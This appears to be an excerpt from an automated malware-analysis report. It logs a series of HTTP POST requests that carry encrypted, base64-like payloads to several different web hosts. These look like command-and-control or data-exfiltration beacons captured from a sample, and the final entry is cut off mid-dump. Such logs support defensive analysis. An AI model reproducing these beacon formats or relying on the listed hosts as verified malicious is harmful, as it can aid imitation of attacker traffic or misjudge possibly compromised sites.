kJGgm7VEapflW6TGHI7h+a6SwLdDbvNruTS2KGImFGotVrNVvUJZ1jNgsqf85/KcJiJzo/kIb1Ia8yxGGHFC+/pnerYl+vpTGlxTrmdOaE4cR5//f993kh2mYzCzwsZigTVetXgFvoqFQE3+Qpcn/l27sxCjwYPwW+KipRLT3otMhRxSJFjjH+A1IiNrIN0opLxFcdWE5aZCQ8Y8LZ63ahVM+CBG3NZLPxWBbKXhuuUFw6SvmkcvZjC1qPFkumvanacUNc6PEaUvpA4Hj31at932ukdpw9dowOgMum0hCHPt9RAeyIzpJpbk2Rk89evsTfm2AoeZtXTe+lWKRzkVWqQhfs1UU16qedKgU/t4aB90BFW6GF3pbbNVHhPG6cUiwhRPp6REIVOOCdEwtGtiGcHYgQSDKFK1xdWdl6ShDlZlk6oIaFbyNd4L12+beKIACUjeZpzA7cTpnxcUGlH+MXF2YP0Ie+zjEGfZESOFr1CZOQypco82v5Z5ufVAI9ugO2WKq9RZQ4VznC0feB6QVxXd3Og0AT8Aj/SjoXilmPtIZm4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 55 75 63 2b 6f 72 6c 37 61 70 63 74 4d 32 72 6c 53 50 45 7a 62 31 4a 51 69 6a 43 58 57 31 33 61 2f 66 46 65 66 39 32 74 4b 6d 59 78 32 57 47 6f 44 76 61 73 67 53 51 48 42 2b 34 6b 52 6d 4c 32 34 69 31 4f 30 66 31 6c 47 7a 4f 74 61 30 32 34 4b 63 70 56 53 73 57 6e 50 67 69 34 4c 76 43 49 62 70 53 2f 61 46 79 77 70 33 4f 67 30 6a 5a 6a 65 54 71 33 52 62 4c 43 4d 35 75 71 72 74 66 64 71 76 54 57 4e 56 32 6f 69 79 4c 35 55 54 66 35 42 44 4c 52 79 75 52 7a 2b 56 79 33 77 34 54 5a 61 2b 51 63 61 71 44 6e 62 67 67 49 69 64 39 41 4e 38 44 33 6e 64 67 65 46 2b 4d 66 59 76 54 36 65 57 2b 64 39 56 6e 6d 6b 39 39 4d 62 52 76 51 41 68 55 68 32 32 44 66 5a 77 42 69 4c 4d 51 79 35 38 56 36 52 56 4e 64 2f 31 4a 30 44 64 54 67 53 6d 77 61 54 4f 4b 31 73 33 4e 61 6c 64 74 76 4b 77 31 4b 36 53 46 53 6f 79 59 61 75 4f 32 42 6f 6b 32 72 53 58 64 6f 4e 72 34 58 76 73 70 50 6f 42 30 50 78 53 63 70 30 78 45 4a 7a 42 68 42 43 36 31 56 48 73 4a 58 33 6e 4b 6a 6a 43 34 68 4a 39 58 39 51 43 34 65 42 36 69 62 41 64 47 2b 46 74 43 6b 78 34 79 74 33 75 44 58 5a 77 65 64 4e 6b 41 59 6d 33 4d 78 34 32 61 71 42 7a 6e 69 42 39 77 6d 55 71 76 46 6b 73 6c 76 70 4f 61 75 4e 75 34 42 75 39 37 6a 78 79 4c 49 66 2f 30 54 6c 75 36 46 38 73 42 68 46 39 30 35 52 7a 63 63 78 4d 42 73 64 34 61 65 6f 33 35 30 43 54 58 63 50 33 6f 50 34 49 6c 6a 73 6b 54 78 63 69 2b 77 76 38 45 2b 31 46 4c 51 43 4a 6a 51 66 38 6f 38 56 33 4c 30 61 77 58 6b 32 49 51 58 7a 31 65 4f 6a 38 69 6d 31 67 55 65 32 49 69 6e 64 37 39 77 56 41 5a 65 36 30 73 65 7a 55 6f 54 2f 58 68 74 53 77 48 4d 72 73 73 51 62 7a 5a 64 4a 64 68 65 61 67 52 50 6e 66 2b 78 6a 50 4d 71 67 77 7a 42 53 6c 76 4c 67 79 51 3d Data Ascii: Uuc+orl7apctM2rlSPEzb1JQijCXW13a/fFef92tKmYx2WGoDvasgSQHB+4kRmL24i1O0f1lGzOta024KcpVSsWnPgi4LvCIbpS/aFywp3Og0jZjeTq3RbLCM5uqrtfdqvTWNV2oiyL5UTf5BDLRyuRz+Vy3w4TZa+QcaqDnbggIid9AN8D3ndgeF+MfYvT6eW+d9Vnmk99MbRvQAhUh22DfZwBiLMQy58V6RVNd/1J0DdTgSmwaTOK1s3NaldtvKw1K6SFSoyYauO2Bok2rSXdoNr4XvspPoB0PxScp0xEJzBhBC61VHsJX3nKjjC4hJ9X9QC4eB6ibAdG+FtCkx4yt3uDXZwedNkAYm3Mx42aqBzniB9wmUqvFkslvpOauNu4Bu97jxyLIf/0Tlu6F8sBhF905RzccxMBsd4aeo350CTXcP3oP4IljskTxci+wv8E+1FLQCJjQf8o8V3L0awXk2IQXz1eOj8im1gUe2Iind79wVAZe60sezUoT/XhtSwHMrssQbzZdJdheagRPnf+xjPMqgwzBSlvLgyQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 76 45 68 4d 5a 48 73 6f 59 4a 63 50 42 4d 68 76 45 67 4e 31 4d 47 51 55 50 36 79 42 50 47 78 4f 33 35 6b 61 6f 73 30 70 53 49 43 59 44 75 48 2f 66 55 54 51 62 35 4b 7a 78 45 45 47 6c 64 2b 43 70 2f 66 31 70 65 33 38 43 72 41 54 57 48 5a 58 63 69 6c 67 39 6f 68 30 30 42 4d 53 49 32 34 55 6a 54 73 4d 61 77 53 79 6c 39 4e 6f 62 7a 62 66 64 5a 63 49 41 78 55 47 4b 47 79 30 4a 4d 36 4c 70 56 4a 51 4b 6c 78 6b 5a 38 69 43 79 48 74 43 36 47 34 59 67 7a 5a 73 33 4b 49 58 35 78 50 4a 61 74 6d 52 38 55 71 38 51 31 2b 56 62 59 43 68 77 38 75 64 49 75 47 52 5a 30 76 73 69 66 37 75 32 41 6a 77 2b 4d 70 59 68 6c 2b 6b 62 6a 32 39 53 41 4d 6c 72 4e 79 59 4e 48 4c 55 6b 4a 35 42 41 4f 4c 71 37 6a 6e 76 37 32 57 49 45 2b 77 46 58 61 66 5a 57 6f 51 58 4f 64 35 70 48 62 74 72 35 6a 53 58 46 4f 47 62 41 30 4d 41 50 79 7a 44 42 44 55 75 49 37 2b 44 4e 45 73 79 69 64 61 4a 6b 2b 35 65 42 2f 2b 55 39 79 34 78 34 33 6b 70 2b 61 6a 33 57 75 76 4b 43 6f 61 36 79 56 32 62 4d 52 34 45 6c 32 64 41 45 55 58 6b 45 71 63 72 2f 75 58 66 55 49 6d 75 4e 56 67 6b 79 72 52 47 5a 43 46 50 4d 7a 2b 65 36 4d 32 62 41 4a 5a 47 4d 54 31 77 68 35 72 2b 77 57 5a 68 50 78 54 6c 61 79 74 63 46 6d 75 71 35 46 41 77 34 78 65 2b 62 61 77 5a 4b 50 41 74 51 56 49 49 2f 74 74 68 6c 2b 36 73 6e 32 65 78 30 49 35 56 32 49 6a 2b 72 50 77 6e 50 38 52 53 4f 2f 78 67 49 47 4f 76 5a 78 49 63 54 69 63 50 45 62 63 59 76 78 48 39 38 35 46 6f 5a 45 39 70 79 6c 65 76 78 50 71 54 6f 78 62 64 4d 69 59 37 5a 36 5a 57 51 46 65 71 61 72 6c 61 53 56 32 4c 55 34 51 2f 72 75 43 75 71 38 46 45 2b 52 6c 47 67 49 52 53 30 68 47 4c 65 42 50 52 76 2f 78 6a 77 77 63 76 68 42 62 61 52 33 74 65 67 41 64 42 71 39 59 66 35 50 33 64 49 66 49 2f 37 36 67 6f 32 66 30 5a 63 50 44 59 6c 71 38 72 65 53 34 33 Data Ascii: vEhMZHsoYJcPBMhvEgN1MGQUP6yBPGxO35kaos0pSICYDuH/fUTQb5KzxEEGld+Cp/f1pe38CrATWHZXcilg9oh00BMSI24UjTsMawSyl9NobzbfdZcIAxUGKGy0JM6LpVJQKlxkZ8iCyHtC6G4YgzZs3KIX5xPJatmR8Uq8Q1+VbYChw8udIuGRZ0vsif7u2Ajw+MpYhl+kbj29SAMlrNyYNHLUkJ5BAOLq7jnv72WIE+wFXafZWoQXOd5pHbtr5jSXFOGbA0MAPyzDBDUuI7+DNEsyidaJk+5eB/+U9y4x43kp+aj3WuvKCoa6yV2bMR4El2dAEUXkEqcr/uXfUImuNVgkyrRGZCFPMz+e6M2bAJZGMT1wh5r+wWZhPxTlaytcFmuq5FAw4xe+bawZKPAtQVII/tthl+6sn2ex0I5V2Ij+rPwnP8RSO/xgIGOvZxIcTicPEbcYvxH985FoZE9pylevxPqToxbdMiY7Z6ZWQFeqarlaSV2LU4Q/ruCuq8FE+RlGgIRS0hGLeBPRv/xjwwcvhBbaR3tegAdBq9Yf5P3dIfI/76go2f0ZcPDYlq8reS43
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 4c 34 77 54 6f 4c 4a 70 61 70 64 77 4f 45 32 6e 35 54 31 56 70 62 58 6c 65 35 65 43 42 35 2f 73 42 6d 76 41 71 68 76 62 64 2b 46 79 54 6b 35 4c 79 4d 6d 41 35 6d 6a 48 33 55 54 55 6f 37 6d 68 67 6e 56 44 59 61 76 4c 4e 54 77 6c 4d 33 55 61 4b 4b 2b 54 2f 52 58 6d 59 77 72 63 4c 55 6e 6d 64 56 45 52 43 37 39 4f 57 77 47 32 53 54 42 38 53 32 49 73 51 36 34 72 30 55 2b 7a 31 42 55 49 56 75 35 35 78 67 48 32 73 34 31 71 72 58 65 77 43 53 4a 68 70 42 71 73 34 61 64 6b 52 7a 56 56 2b 70 52 57 75 52 59 6e 7a 56 77 6e 33 58 77 48 76 6e 41 69 53 67 65 63 79 64 51 62 41 33 6c 67 62 6b 4f 75 43 2b 45 51 44 4f 43 36 41 4d 64 6e 5a 52 71 33 77 56 61 53 71 4d 5a 32 32 79 73 39 46 6a 31 49 39 33 57 36 52 48 76 6f 47 43 69 48 64 31 74 34 74 75 45 48 35 64 2b 54 68 6a 63 46 58 7a 43 44 77 7a 4a 45 35 77 35 31 39 76 4b 76 4d 69 72 41 31 57 4d 44 6c 32 4d 4f 5a 37 66 57 55 6a 78 6a 6f 5a 42 4e 68 36 68 4e 76 4f 7a 67 37 77 73 4a 62 78 38 65 77 65 72 48 49 78 74 68 51 64 45 68 55 70 50 69 58 70 75 66 33 7a 76 5a 55 5a 61 47 75 68 79 33 71 58 34 52 78 36 4b 54 77 38 69 43 57 78 50 56 46 4f 59 49 55 41 31 78 46 41 36 53 57 30 2f 47 69 78 44 4d 43 45 50 31 61 44 36 45 72 64 44 69 6c 2b 4d 51 6b 54 61 72 4e 61 69 4e 59 50 79 57 2b 43 58 52 6a 43 39 50 78 41 34 62 36 58 7a 56 79 34 50 6c 35 75 4a 37 4f 34 68 74 66 78 79 69 61 4e 77 73 63 42 4e 5a 4a 65 59 68 61 32 77 54 67 77 2f 35 32 51 4d 64 39 2f 6c 71 63 30 53 30 6a 65 51 61 4e 6c 39 70 4f 4c 47 4b 54 36 6d 79 38 2f 2f 36 57 65 57 4f 74 64 36 52 42 53 46 6a 4e 6a 45 72 67 77 43 30 65 55 2b 49 5a 36 41 4d 79 33 46 61 58 6d 68 47 55 62 58 32 61 37 45 48 30 48 58 49 79 31 33 51 4d 65 61 5a 74 4e 34 4e 64 31 63 3d Data Ascii: L4wToLJpapdwOE2n5T1VpbXle5eCB5/sBmvAqhvbd+FyTk5LyMmA5mjH3UTUo7mhgnVDYavLNTwlM3UaKK+T/RXmYwrcLUnmdVERC79OWwG2STB8S2IsQ64r0U+z1BUIVu55xgH2s41qrXewCSJhpBqs4adkRzVV+pRWuRYnzVwn3XwHvnAiSgecydQbA3lgbkOuC+EQDOC6AMdnZRq3wVaSqMZ22ys9Fj1I93W6RHvoGCiHd1t4tuEH5d+ThjcFXzCDwzJE5w519vKvMirA1WMDl2MOZ7fWUjxjoZBNh6hNvOzg7wsJbx8ewerHIxthQdEhUpPiXpuf3zvZUZaGuhy3qX4Rx6KTw8iCWxPVFOYIUA1xFA6SW0/GixDMCEP1aD6ErdDil+MQkTarNaiNYPyW+CXRjC9PxA4b6XzVy4Pl5uJ7O4htfxyiaNwscBNZJeYha2wTgw/52QMd9/lqc0S0jeQaNl9pOLGKT6my8//6WeWOtd6RBSFjNjErgwC0eU+IZ6AMy3FaXmhGUbX2a7EH0HXIy13QMeaZtN4Nd1c=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4e 50 6a 73 6e 69 42 67 61 70 65 73 34 2f 4a 35 63 35 52 43 73 6c 4d 63 46 56 36 49 51 5a 68 6a 56 41 45 57 2b 6c 52 42 38 44 5a 39 4b 6e 49 45 63 33 38 46 4e 47 38 70 56 4a 42 6d 4b 4e 64 61 73 2b 67 38 78 61 70 4c 67 63 68 46 50 6a 46 33 43 77 43 53 77 42 69 4c 72 4f 43 74 35 2b 52 48 5a 51 72 66 2b 47 37 69 30 65 32 30 50 33 42 5a 47 34 63 4d 57 30 53 72 4f 39 67 37 64 32 64 58 48 4b 6e 52 56 4c 75 4a 6e 34 37 31 4e 35 2f 75 74 79 4f 79 71 33 64 2f 64 42 31 36 46 74 58 30 67 72 56 31 63 54 38 38 70 38 33 6c 30 70 70 6b 65 75 47 38 47 59 67 53 41 4c 31 58 32 6e 35 6b 53 67 53 46 37 42 78 68 4e 34 55 62 6a 74 43 50 33 34 55 34 50 7a 30 38 2f 73 78 54 78 6e 68 4b 37 6c 69 33 44 69 54 54 46 72 54 6f 75 74 76 59 6e 79 4f 75 45 63 2f 2b 64 44 59 32 6d 39 69 45 48 68 74 49 55 6e 62 70 35 6d 47 66 6d 50 79 30 77 37 61 30 7a 33 74 37 43 5a 71 31 62 35 34 6d 51 58 41 47 6d 50 47 43 53 73 34 53 39 59 55 56 66 78 75 74 50 4e 42 45 71 6e 7a 77 48 31 37 6d 2b 48 4a 47 5a 6e 4d 35 48 4c 37 56 6e 56 4a 69 4a 34 61 46 30 30 64 68 4a 41 49 38 63 64 6d 33 65 59 78 57 35 35 35 69 59 70 34 6b 6b 32 53 52 73 50 38 51 78 31 30 78 63 52 65 7a 4e 50 4f 31 43 76 50 57 72 4b 38 39 70 7a 77 79 38 4c 6b 76 58 43 47 32 52 53 72 79 38 2f 42 75 33 63 41 45 6b 49 4c 48 6b 49 4a 79 30 49 72 65 53 2b 45 77 6a 38 65 6c 5a 6f 46 6c 47 42 36 7a 35 4c 77 52 30 4a 74 49 31 35 54 56 4b 63 44 6c 32 74 44 32 72 74 38 48 75 33 4e 5a 2f 50 76 64 6d 46 45 71 48 31 7a 5a 71 35 59 75 69 46 4d 68 54 6c 63 4d 35 4e 4c 4c 4f 71 78 2f 7a 52 73 73 6c 64 65 59 4d 4e 70 76 4e 77 4e 37 78 34 38 53 76 37 61 4c 68 70 63 74 70 62 35 6e 37 58 73 4e 37 51 68 38 76 4d 43 4b 2f 49 2f 4f 44 64 41 56 49 59 72 71 78 38 72 59 38 37 6b 32 71 54 37 55 79 6d 4c 33 6e 70 4e 71 59 55 55 42 68 77 3d 3d Data Ascii: NPjsniBgapes4/J5c5RCslMcFV6IQZhjVAEW+lRB8DZ9KnIEc38FNG8pVJBmKNdas+g8xapLgchFPjF3CwCSwBiLrOCt5+RHZQrf+G7i0e20P3BZG4cMW0SrO9g7d2dXHKnRVLuJn471N5/utyOyq3d/dB16FtX0grV1cT88p83l0ppkeuG8GYgSAL1X2n5kSgSF7BxhN4UbjtCP34U4Pz08/sxTxnhK7li3DiTTFrToutvYnyOuEc/+dDY2m9iEHhtIUnbp5mGfmPy0w7a0z3t7CZq1b54mQXAGmPGCSs4S9YUVfxutPNBEqnzwH17m+HJGZnM5HL7VnVJiJ4aF00dhJAI8cdm3eYxW555iYp4kk2SRsP8Qx10xcRezNPO1CvPWrK89pzwy8LkvXCG2RSry8/Bu3cAEkILHkIJy0IreS+Ewj8elZoFlGB6z5LwR0JtI15TVKcDl2tD2rt8Hu3NZ/PvdmFEqH1zZq5YuiFMhTlcM5NLLOqx/zRssldeYMNpvNwN7x48Sv7aLhpctpb5n7XsN7Qh8vMCK/I/ODdAVIYrqx8rY87k2qT7UymL3npNqYUUBhw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 6b 4a 47 67 6d 37 56 45 61 70 66 6c 57 36 54 47 48 49 37 68 2b 61 36 53 77 4c 64 44 62 76 4e 72 75 54 53 32 4b 47 49 6d 46 47 6f 74 56 72 4e 56 76 55 4a 5a 31 6a 4e 67 73 71 66 38 35 2f 4b 63 4a 69 4a 7a 6f 2f 6b 49 62 31 49 61 38 79 78 47 47 48 46 43 2b 2f 70 6e 65 72 59 6c 2b 76 70 54 47 6c 78 54 72 6d 64 4f 61 45 34 63 52 35 2f 2f 66 39 39 33 6b 68 32 6d 59 7a 43 7a 77 73 5a 69 67 54 56 65 74 58 67 46 76 6f 71 46 51 45 33 2b 51 70 63 6e 2f 6c 32 37 73 78 43 6a 77 59 50 77 57 2b 4b 69 70 52 4c 54 33 6f 74 4d 68 52 78 53 4a 46 6a 6a 48 2b 41 31 49 69 4e 72 49 4e 30 6f 70 4c 78 46 63 64 57 45 35 61 5a 43 51 38 59 38 4c 5a 36 33 61 68 56 4d 2b 43 42 47 33 4e 5a 4c 50 78 57 42 62 4b 58 68 75 75 55 46 77 36 53 76 6d 6b 63 76 5a 6a 43 31 71 50 46 6b 75 6d 76 61 6e 61 63 55 4e 63 36 50 45 61 55 76 70 41 34 48 6a 33 31 61 74 39 33 32 75 6b 64 70 77 39 64 6f 77 4f 67 4d 75 6d 30 68 43 48 50 74 39 52 41 65 79 49 7a 70 4a 70 62 6b 32 52 6b 38 39 65 76 73 54 66 6d 32 41 6f 65 5a 74 58 54 65 2b 6c 57 4b 52 7a 6b 56 57 71 51 68 66 73 31 55 55 31 36 71 65 64 4b 67 55 2f 74 34 61 42 39 30 42 46 57 36 47 46 33 70 62 62 4e 56 48 68 50 47 36 63 55 69 77 68 52 50 70 36 52 45 49 56 4f 4f 43 64 45 77 74 47 74 69 47 63 48 59 67 51 53 44 4b 46 4b 31 78 64 57 64 6c 36 53 68 44 6c 5a 6c 6b 36 6f 49 61 46 62 79 4e 64 34 4c 31 32 2b 62 65 4b 49 41 43 55 6a 65 5a 70 7a 41 37 63 54 70 6e 78 63 55 47 6c 48 2b 4d 58 46 32 59 50 30 49 65 2b 7a 6a 45 47 66 5a 45 53 4f 46 72 31 43 5a 4f 51 79 70 63 6f 38 32 76 35 5a 35 75 66 56 41 49 39 75 67 4f 32 57 4b 71 39 52 5a 51 34 56 7a 6e 43 30 66 65 42 36 51 56 78 58 64 33 4f 67 30 41 54 38 41 6a 2f 53 6a 6f 58 69 6c 6d 50 74 49 5a 6d 34 3d Data Ascii: kJGgm7VEapflW6TGHI7h+a6SwLdDbvNruTS2KGImFGotVrNVvUJZ1jNgsqf85/KcJiJzo/kIb1Ia8yxGGHFC+/pnerYl+vpTGlxTrmdOaE4cR5//f993kh2mYzCzwsZigTVetXgFvoqFQE3+Qpcn/l27sxCjwYPwW+KipRLT3otMhRxSJFjjH+A1IiNrIN0opLxFcdWE5aZCQ8Y8LZ63ahVM+CBG3NZLPxWBbKXhuuUFw6SvmkcvZjC1qPFkumvanacUNc6PEaUvpA4Hj31at932ukdpw9dowOgMum0hCHPt9RAeyIzpJpbk2Rk89evsTfm2AoeZtXTe+lWKRzkVWqQhfs1UU16qedKgU/t4aB90BFW6GF3pbbNVHhPG6cUiwhRPp6REIVOOCdEwtGtiGcHYgQSDKFK1xdWdl6ShDlZlk6oIaFbyNd4L12+beKIACUjeZpzA7cTpnxcUGlH+MXF2YP0Ie+zjEGfZESOFr1CZOQypco82v5Z5ufVAI9ugO2WKq9RZQ4VznC0feB6QVxXd3Og0AT8Aj/SjoXilmPtIZm4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 49 69 49 46 6f 79 71 43 61 70 64 48 65 4a 36 65 44 55 76 4f 45 75 30 73 6c 38 4a 61 4e 64 72 76 2f 6c 61 61 69 56 43 47 37 48 54 43 57 67 39 57 48 73 53 5a 4a 67 43 31 74 31 75 2f 76 4a 77 6c 5a 76 73 75 75 6b 7a 30 58 4d 70 74 4c 37 76 68 69 62 30 58 31 70 78 4e 6f 43 32 69 49 62 6b 4f 43 4e 69 70 78 55 67 56 42 61 66 38 58 35 47 33 6f 6d 45 63 59 35 67 37 36 32 37 44 71 76 52 67 6b 57 57 72 55 48 69 2f 73 72 52 35 6e 6a 42 36 4b 58 55 4a 4e 43 44 78 6d 32 4b 35 6a 72 4c 55 31 62 37 67 5a 32 75 35 39 4d 50 43 75 59 68 41 43 57 35 4c 4f 58 48 7a 4d 70 79 78 66 50 4e 44 4e 6f 33 46 67 63 62 43 38 58 73 77 46 49 58 4d 4f 66 45 56 2b 35 6f 2f 38 2b 66 70 73 57 58 56 2b 63 6f 51 6c 61 64 55 33 67 55 48 7a 31 55 61 6c 4c 62 4b 56 59 67 6a 63 51 57 4b 37 4e 35 46 66 63 4c 38 39 37 6e 6f 39 64 32 74 74 2f 79 6d 46 56 66 4e 6d 4b 61 49 62 52 71 4b 63 34 2b 4a 70 6d 45 74 75 48 39 74 2b 70 78 65 61 61 42 39 46 52 5a 51 76 4b 67 66 56 77 6e 4d 68 4f 62 38 53 73 6f 38 44 33 41 50 57 77 56 54 53 52 2b 49 2f 63 31 64 41 65 38 62 6f 55 59 62 31 68 59 46 71 39 68 55 4c 68 49 37 42 42 33 6b 59 57 79 75 43 72 32 42 52 56 7a 74 37 38 4d 64 77 63 6c 6d 50 65 59 68 57 78 4f 67 30 2f 67 68 4e 71 38 76 57 58 7a 49 66 54 46 4a 4f 5a 7a 43 6d 53 4e 4a 38 6b 5a 53 70 59 4d 65 2b 61 66 6d 6c 44 2b 53 71 32 35 64 31 39 34 68 35 37 4d 6c 54 7a 64 56 72 6f 36 76 63 35 5a 79 50 66 55 36 64 75 68 52 45 2f 73 4e 70 72 56 39 5a 4b 6e 39 6c 5a 4f 58 75 62 4c 69 53 55 45 75 34 2f 6e 30 70 6d 31 47 2f 31 4f 54 74 54 32 68 73 2b 70 61 2f 6d 4c 57 78 50 6c 43 55 62 2f 57 68 6c 50 78 75 47 77 36 2f 50 6c 44 7a 63 6f 33 38 38 31 6f 50 6f 38 4f 61 2f 55 34 37 4a 36 51 57 62 58 75 5a 77 3d 3d Data Ascii: IiIFoyqCapdHeJ6eDUvOEu0sl8JaNdrv/laaiVCG7HTCWg9WHsSZJgC1t1u/vJwlZvsuukz0XMptL7vhib0X1pxNoC2iIbkOCNipxUgVBaf8X5G3omEcY5g7627DqvRgkWWrUHi/srR5njB6KXUJNCDxm2K5jrLU1b7gZ2u59MPCuYhACW5LOXHzMpyxfPNDNo3FgcbC8XswFIXMOfEV+5o/8+fpsWXV+coQladU3gUHz1UalLbKVYgjcQWK7N5FfcL897no9d2tt/ymFVfNmKaIbRqKc4+JpmEtuH9t+pxeaaB9FRZQvKgfVwnMhOb8Sso8D3APWwVTSR+I/c1dAe8boUYb1hYFq9hULhI7BB3kYWyuCr2BRVzt78MdwclmPeYhWxOg0/ghNq8vWXzIfTFJOZzCmSNJ8kZSpYMe+afmlD+Sq25d194h57MlTzdVro6vc5ZyPfU6duhRE/sNprV9ZKn9lZOXubLiSUEu4/n0pm1G/1OTtT2hs+pa/mLWxPlCUb/WhlPxuGw6/PlDzco3881oPo8Oa/U47J6QWbXuZw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 67 52 4f 74 46 71 52 44 62 70 66 52 72 4a 66 35 50 37 72 2f 64 6e 66 43 53 57 64 63 31 57 4b 70 47 44 76 36 71 79 51 54 67 33 46 51 54 59 7a 6a 34 49 51 76 54 49 4b 7a 41 79 46 69 76 34 71 70 78 79 4b 59 34 68 56 55 6b 77 4b 70 44 67 33 41 74 7a 45 48 76 76 49 74 2b 6f 58 32 4e 31 59 6f 6c 71 37 4c 32 46 4c 31 36 59 73 36 72 49 63 69 4e 52 2b 47 68 75 57 6d 56 39 33 49 78 38 59 53 75 79 69 52 2f 77 41 5a 56 48 41 71 69 6a 31 64 68 4f 57 43 2f 58 31 61 32 64 6b 4b 31 58 37 49 6a 4c 66 39 6a 30 43 6f 59 67 4a 51 69 64 79 69 78 4b 59 47 72 49 4e 4e 77 6c 35 63 33 6b 43 79 38 76 45 57 52 2b 59 54 6e 6d 43 58 36 54 48 52 6f 5a 68 4a 39 42 58 4a 4d 62 42 56 6a 6c 35 42 2f 57 79 55 51 46 66 34 6f 44 4c 51 39 79 6a 6f 6a 75 66 6a 57 2f 4b 42 38 38 38 4e 66 75 78 4b 48 69 48 77 6b 7a 33 7a 43 6b 65 61 78 51 4d 74 38 59 30 4c 4c 74 52 43 6b 42 46 72 56 33 68 6e 4f 78 34 46 63 34 45 62 74 53 6d 54 4d 6a 6d 36 6b 6a 58 31 53 34 78 34 45 30 51 6c 6e 73 75 78 31 49 48 63 4a 6f 58 42 47 75 4a 48 58 33 71 72 32 69 70 77 33 71 78 48 6b 6a 4e 4b 4e 37 70 33 73 78 41 58 63 58 2f 38 71 49 4a 6f 33 61 35 6d 2b 50 6b 37 34 64 38 32 6d 37 69 59 63 4b 54 4f 76 58 54 53 34 76 6a 75 30 66 7a 66 62 66 58 2b 69 41 35 78 51 4e 2b 6d 48 4c 79 50 6a 41 67 63 67 2b 51 75 34 65 42 36 34 56 6c 2f 4a 4f 51 54 66 69 73 69 69 78 52 45 6c 6e 67 43 64 47 50 39 53 69 55 49 4c 4c 68 2b 2f 6b 49 4b 4c 74 74 53 55 76 65 4c 49 6a 45 56 5a 4d 67 70 53 34 59 2b 76 4e 56 2b 47 74 31 76 59 6e 56 55 35 7a 71 52 74 6c 33 78 62 42 41 62 65 68 65 57 4e 6e 48 74 67 32 61 50 31 4c 66 44 6a 67 7a 36 73 45 36 4a 78 7a 41 78 37 67 3d 3d Data Ascii: gROtFqRDbpfRrJf5P7r/dnfCSWdc1WKpGDv6qyQTg3FQTYzj4IQvTIKzAyFiv4qpxyKY4hVUkwKpDg3AtzEHvvIt+oX2N1Yolq7L2FL16Ys6rIciNR+GhuWmV93Ix8YSuyiR/wAZVHAqij1dhOWC/X1a2dkK1X7IjLf9j0CoYgJQidyixKYGrINNwl5c3kCy8vEWR+YTnmCX6THRoZhJ9BXJMbBVjl5B/WyUQFf4oDLQ9yjojufjW/KB888NfuxKHiHwkz3zCkeaxQMt8Y0LLtRCkBFrV3hnOx4Fc4EbtSmTMjm6kjX1S4x4E0Qlnsux1IHcJoXBGuJHX3qr2ipw3qxHkjNKN7p3sxAXcX/8qIJo3a5m+Pk74d82m7iYcKTOvXTS4vju0fzfbfX+iA5xQN+mHLyPjAgcg+Qu4eB64Vl/JOQTfisiixRElngCdGP9SiUILLh+/kIKLttSUveLIjEVZMgpS4Y+vNV+Gt1vYnVU5zqRtl3xbBAbeheWNnHtg2aP1LfDjgz6sE6JxzAx7g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 67 52 4f 74 46 71 52 44 62 70 66 52 72 4a 66 35 50 37 72 2f 64 6e 66 43 53 57 64 63 31 57 4b 70 47 44 76 36 71 79 51 54 67 33 46 51 54 59 7a 6a 34 49 51 76 54 49 4b 7a 41 79 46 69 76 34 71 70 78 79 4b 59 34 68 56 55 6b 77 4b 70 44 67 33 41 74 7a 45 48 76 76 49 74 2b 6f 58 32 4e 31 59 6f 6c 71 37 4c 32 46 4c 31 36 59 73 36 72 49 63 69 4e 52 2b 47 68 75 57 6d 56 39 33 49 78 38 59 53 75 79 69 52 2f 77 41 5a 56 48 41 71 69 6a 31 64 68 4f 57 43 2f 58 31 61 32 64 6b 4b 31 58 37 49 6a 4c 66 39 6a 30 43 6f 59 67 4a 51 69 64 79 69 78 4b 59 47 72 49 4e 4e 77 6c 35 63 33 6b 43 79 38 76 45 57 52 2b 59 54 6e 6d 43 58 36 54 48 52 6f 5a 68 4a 39 42 58 4a 4d 62 42 56 6a 6c 35 42 2f 57 79 55 51 46 66 34 6f 44 4c 51 39 79 6a 6f 6a 75 66 6a 57 2f 4b 42 38 38 38 4e 66 75 78 4b 48 69 48 77 6b 7a 33 7a 43 6b 65 61 78 51 4d 74 38 59 30 4c 4c 74 52 43 6b 42 46 72 56 33 68 6e 4f 78 34 46 63 34 45 62 74 53 6d 54 4d 6a 6d 36 6b 6a 58 31 53 34 78 34 45 30 51 6c 6e 73 75 78 31 49 48 63 4a 6f 58 42 47 75 4a 48 